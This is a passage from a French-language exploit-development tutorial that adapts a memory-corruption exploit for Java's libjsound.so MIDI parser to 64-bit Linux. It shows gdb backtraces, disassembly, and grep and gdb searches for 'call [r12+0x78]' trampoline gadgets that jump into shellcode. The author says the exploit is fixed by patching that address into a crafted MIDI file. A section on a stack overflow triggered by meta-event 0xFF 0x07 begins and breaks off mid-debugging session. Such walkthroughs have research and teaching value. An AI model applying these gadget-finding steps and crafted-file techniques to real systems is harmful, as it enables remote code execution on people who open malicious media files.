class="crayon-v">bt</span></div><div class="crayon-line" id="crayon-5997722bc4801524881161-11"><span class="crayon-p">#0 0x000000006d53cb6d in ?? ()</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4801524881161-12"><span class="crayon-p">#1 0x00007f679e5abe66 in PV_CallControlCallbacks () from /opt/oracle-jre/jdk1.6.0_01/jre/lib/amd64/libjsound.so</span></div><div class="crayon-line" id="crayon-5997722bc4801524881161-13"><span class="crayon-p">#2 0x00007f679e5ae094 in PV_ProcessMidiSequencerSlice () from /opt/oracle-jre/jdk1.6.0_01/jre/lib/amd64/libjsound.so</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4801524881161-14"><span class="crayon-p">#3 0x00007f679e5ae52b in PV_ProcessSequencerEvents () from /opt/oracle-jre/jdk1.6.0_01/jre/lib/amd64/libjsound.so</span></div><div class="crayon-line" id="crayon-5997722bc4801524881161-15"><span class="crayon-p">#4 0x00007f679e5b2036 in PV_ProcessSampleFrame () from /opt/oracle-jre/jdk1.6.0_01/jre/lib/amd64/libjsound.so</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4801524881161-16"><span class="crayon-p">#5 0x00007f679e5b1d6b in HAE_BuildMixerSlice () from /opt/oracle-jre/jdk1.6.0_01/jre/lib/amd64/libjsound.so</span></div><div class="crayon-line" id="crayon-5997722bc4801524881161-17"><span class="crayon-p">#6 0x00007f679e5c02cd in PV_AudioWaveOutFrameThread () from /opt/oracle-jre/jdk1.6.0_01/jre/lib/amd64/libjsound.so</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4801524881161-18"><span class="crayon-p">#7 0x00007f679e59e592 in Java_com_sun_media_sound_MixerThread_runNative () from /opt/oracle-jre/jdk1.6.0_01/jre/lib/amd64/libjsound.so</span></div><div class="crayon-line" id="crayon-5997722bc4801524881161-19"><span class="crayon-p">#8 0x00007f67e5013df7 in ?? ()</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4801524881161-20"><span class="crayon-p">#9 0x0000000000000000 in ?? ()</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0026 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Rappelons que le code de <span style="color: #ff0000;"><b>PV_ProcessMidiSequencerSlice</b></span> est le suivant :</span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc4808164936919" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
midi_byte = midi_stream++; /* cette ligne de code en assembleur nous indiquera le registre qui pointe vers midi_stream */
[…]
PV_CallControlCallbacks(threadContext, pSong, MIDIChannel,
                       (INT16)currentTrack, (INT16)controler, (UINT16)midi_byte);</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc4808164936919-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4808164936919-2">2</div><div class="crayon-num" data-line="crayon-5997722bc4808164936919-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4808164936919-4">4</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc4808164936919-1"><span class="crayon-v">midi_byte</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-v">midi_stream</span><span class="crayon-o">++</span><span class="crayon-sy">;</span><span class="crayon-h"> </span><span class="crayon-c">/* cette ligne de code en assembleur nous indiquera le registre qui pointe vers midi_stream */</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4808164936919-2"><span class="crayon-sy">[</span>…<span class="crayon-sy">]</span></div><div class="crayon-line" id="crayon-5997722bc4808164936919-3"><span class="crayon-e">PV_CallControlCallbacks</span><span class="crayon-sy">(</span><span class="crayon-v">threadContext</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">pSong</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">MIDIChannel</span><span class="crayon-sy">,</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4808164936919-4"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span><span class="crayon-sy">(</span><span class="crayon-v">INT16</span><span class="crayon-sy">)</span><span class="crayon-v">currentTrack</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-v">INT16</span><span class="crayon-sy">)</span><span class="crayon-v">controler</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-v">UINT16</span><span class="crayon-sy">)</span><span class="crayon-v">midi_byte</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0013 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Donc, en regardant le code assembleur un peu avant <span style="color: #ff0000;"><b>0x00007f679e5ae094</b></span>, nous devrions trouver une instruction d’affectation du pointeur vers le flux d’octets du fichier midi vers un registre suivi d’une instruction incrémentant le pointeur vers le flux. Et effectivement, à l’adresse <span style="color: #ff0000;"><b>0x00007f679e5ae00b</b></span>, nous avons :</span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc480d387046642" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
0x00007f679e5ae00b &lt;+971&gt;: mov 0x6c(%rbx),%eax
0x00007f679e5ae00e &lt;+974&gt;: inc %r12</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc480d387046642-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc480d387046642-2">2</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc480d387046642-1"><span class="crayon-cn">0x00007f679e5ae00b</span><span class="crayon-h"> </span><span class="crayon-o">&lt;</span><span class="crayon-o">+</span><span class="crayon-cn">971</span><span class="crayon-o">&gt;</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-i">mov</span><span class="crayon-h"> </span><span class="crayon-cn">0x6c</span><span class="crayon-sy">(</span><span class="crayon-o">%</span><span class="crayon-v">rbx</span><span class="crayon-sy">)</span><span class="crayon-sy">,</span><span class="crayon-o">%</span><span class="crayon-i">eax</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc480d387046642-2"><span class="crayon-cn">0x00007f679e5ae00e</span><span class="crayon-h"> </span><span class="crayon-o">&lt;</span><span class="crayon-o">+</span><span class="crayon-cn">974</span><span class="crayon-o">&gt;</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">inc</span><span class="crayon-h"> </span><span class="crayon-o">%</span><span class="crayon-v">r12</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0010 seconds] -->
<p><span style="font-family: Verdana, Geneva;"><span style="font-size: small;">Le registre pointant vers le flux n’est donc pas rbx, mais </span><span style="font-size: small; color: #ff0000;"><b>r12</b></span><b style="font-size: small;"> </b><span style="font-size: small;">! Essayons de trouver un </span><span style="font-size: small; color: #ff0000;"><b>jmp r12</b></span><span style="font-size: small;"> (</span><span style="font-size: small; color: #ff0000;"><b>0x41 0xff 0xe4</b></span><span style="font-size: small;">).</span></span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc4813146631615" class="crayon-syntax crayon-theme-dark-terminal crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
$ grep -o 41ffe4 hexa.txt
$</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc4813146631615-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4813146631615-2">2</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc4813146631615-1"><span class="crayon-sy">$</span><span class="crayon-h"> </span><span class="crayon-v">grep</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">o</span><span class="crayon-h"> </span><span class="crayon-cn">41ffe4</span><span class="crayon-h"> </span><span class="crayon-v">hexa</span><span class="crayon-sy">.</span><span class="crayon-i">txt</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4813146631615-2"><span class="crayon-sy">$</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0006 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Toujours rien. Nous ne sommes pas plus avancés qu’avant. Mais, nous n’avons pas dit notre dernier mot ! Essayons de trouver une instruction qui saute vers <span style="color: #ff0000;"><b>r12</b></span> plus un offset :</span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc4817055971379" class="crayon-syntax crayon-theme-dark-terminal crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
$ grep -o "41ff..............." hexa.txt | wc -l
$ 51</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc4817055971379-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4817055971379-2">2</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc4817055971379-1"><span class="crayon-sy">$</span><span class="crayon-h"> </span><span class="crayon-v">grep</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">o</span><span class="crayon-h"> </span><span class="crayon-s">"41ff..............."</span><span class="crayon-h"> </span><span class="crayon-v">hexa</span><span class="crayon-sy">.</span><span class="crayon-v">txt</span><span class="crayon-h"> </span><span class="crayon-o">|</span><span class="crayon-h"> </span><span class="crayon-v">wc</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">l</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4817055971379-2"><span class="crayon-sy">$</span><span class="crayon-h"> </span><span class="crayon-cn">51</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0008 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Nous trouvons donc plus de 50 flux d’octets potentiellement intéressants. En désassemblant ces flux d’octets en instructions <b>[5]</b>, nous trouvons trois instructions très intéressantes.</span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc481d257521579" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
41 ff 54 24 78 call QWORD PTR [r12+0x78]
41 ff 94 24 38 05 00 call QWORD PTR [r12+0x538]
41 ff 94 24 08 01 00 call QWORD PTR [r12+0x108]</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc481d257521579-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc481d257521579-2">2</div><div class="crayon-num" data-line="crayon-5997722bc481d257521579-3">3</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc481d257521579-1"><span class="crayon-cn">41</span><span class="crayon-h"> </span><span class="crayon-i">ff</span><span class="crayon-h"> </span><span class="crayon-cn">54</span><span class="crayon-h"> </span><span class="crayon-cn">24</span><span class="crayon-h"> </span><span class="crayon-cn">78</span><span class="crayon-h"> </span><span class="crayon-e">call </span><span class="crayon-e">QWORD </span><span class="crayon-i">PTR</span><span class="crayon-h"> </span><span class="crayon-sy">[</span><span class="crayon-v">r12</span><span class="crayon-o">+</span><span class="crayon-cn">0x78</span><span class="crayon-sy">]</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc481d257521579-2"><span class="crayon-cn">41</span><span class="crayon-h"> </span><span class="crayon-i">ff</span><span class="crayon-h"> </span><span class="crayon-cn">94</span><span class="crayon-h"> </span><span class="crayon-cn">24</span><span class="crayon-h"> </span><span class="crayon-cn">38</span><span class="crayon-h"> </span><span class="crayon-cn">05</span><span class="crayon-h"> </span><span class="crayon-cn">00</span><span class="crayon-h"> </span><span class="crayon-e">call </span><span class="crayon-e">QWORD </span><span class="crayon-i">PTR</span><span class="crayon-h"> </span><span class="crayon-sy">[</span><span class="crayon-v">r12</span><span class="crayon-o">+</span><span class="crayon-cn">0x538</span><span class="crayon-sy">]</span></div><div class="crayon-line" id="crayon-5997722bc481d257521579-3"><span class="crayon-cn">41</span><span class="crayon-h"> </span><span class="crayon-i">ff</span><span class="crayon-h"> </span><span class="crayon-cn">94</span><span class="crayon-h"> </span><span class="crayon-cn">24</span><span class="crayon-h"> </span><span class="crayon-cn">08</span><span class="crayon-h"> </span><span class="crayon-cn">01</span><span class="crayon-h"> </span><span class="crayon-cn">00</span><span class="crayon-h"> </span><span class="crayon-e">call </span><span class="crayon-e">QWORD </span><span class="crayon-i">PTR</span><span class="crayon-h"> </span><span class="crayon-sy">[</span><span class="crayon-v">r12</span><span class="crayon-o">+</span><span class="crayon-cn">0x108</span><span class="crayon-sy">]</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0018 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Hourra ! Nous venons de trouver des instructions qui nous permettront de sauter vers notre shellcode ! La prochaine étape est de trouver l’adresse d’une de ces instructions (disons la première vers <b>r12+0x78</b>) :</span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc4822121145403" class="crayon-syntax crayon-theme-dark-terminal crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
(gdb) find /b 0x40000000, 0x40009000, 0x41, 0xff, 0x54, 0x24, 0x78
0x400020a0 &lt;JavaMain+160&gt;
1 pattern found.</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc4822121145403-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4822121145403-2">2</div><div class="crayon-num" data-line="crayon-5997722bc4822121145403-3">3</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc4822121145403-1"><span class="crayon-sy">(</span><span class="crayon-v">gdb</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-v">find</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-i">b</span><span class="crayon-h"> </span><span class="crayon-cn">0x40000000</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-cn">0x40009000</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-cn">0x41</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-cn">0xff</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-cn">0x54</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-cn">0x24</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-cn">0x78</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4822121145403-2"><span class="crayon-cn">0x400020a0</span><span class="crayon-h"> </span><span class="crayon-o">&lt;</span><span class="crayon-v">JavaMain</span><span class="crayon-o">+</span><span class="crayon-cn">160</span><span class="crayon-o">&gt;</span></div><div class="crayon-line" id="crayon-5997722bc4822121145403-3"><span class="crayon-cn">1</span><span class="crayon-h"> </span><span class="crayon-e">pattern </span><span class="crayon-v">found</span><span class="crayon-sy">.</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0012 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Ensuite, dans le fichier midi, remplaçons l’ancienne adresse par la nouvelle, et voilà, nous avons réparé l’exploit ! L’exploit d’origine ne fonctionnera sans doute pas sous GNU/Linux, car le code assembleur lance <span style="color: #ff0000;"><b>calc.exe</b></span>, de plus le code assembleur du payload doit être décalé de <span style="color: #ff0000;"><b>0x78</b></span> octets. Il est laissé comme exercice au lecteur d’effectuer les modifications nécessaires pour le rendre utile et fonctionnel sous GNU/Linux 64 bits.</span></p>
<h1 class="western">4. Exploitation d&rsquo;un dépassement de tampon et désactivation du SecurityManager</h1>
<h2 class="western">4.1 Débordement de tampon</h2>
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Dans cette section, nous allons exploiter le dépassement de tampon en version 64 bits pour exécuter notre shellcode. Nous allons tout d’abord tester le comportement du code en 64 bits. Sera-t-il le même qu’en 32 bits ? Pour ce faire, nous utilisons un fichier midi avec le code séquence <span style="color: #ff0000;"><b>0xFF 0x07</b></span> suivi de la taille du tableau à copier et des octets à copier (<span style="color: #ff0000;"><b>0xAAAAAA</b></span>&#8230;). Comme expliqué dans la section 2, la séquence <span style="color: #ff0000;"><b>0xFF 0x07</b></span> servira à déclencher le code qui va faire déborder le tampon et nous permettra d’écrire un zéro n’importe où dans la pile. La fonction vulnérable est <span style="color: #ff0000;"><b>PV_MetaEventCallback</b></span>. Plaçons un breakpoint à l’entrée de la fonction.</span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc482c904773333" class="crayon-syntax crayon-theme-dark-terminal crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
(gdb) break PV_MetaEventCallback
Breakpoint 1 at 0x7f6db5e50980
(gdb) c
Continuing.
[Switching to Thread 0x7f6dace07700 (LWP 21764)]

Thread 22 "java" hit Breakpoint 1, 0x00007f6db5e50980 in PV_MetaEventCallback () from /opt/alex/oracle-jre/jdk1.6.0_01/jre/lib/amd64/libjsound.so</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc482c904773333-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc482c904773333-2">2</div><div class="crayon-num" data-line="crayon-5997722bc482c904773333-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc482c904773333-4">4</div><div class="crayon-num" data-line="crayon-5997722bc482c904773333-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc482c904773333-6">6</div><div class="crayon-num" data-line="crayon-5997722bc482c904773333-7">7</div></div>
				</td>
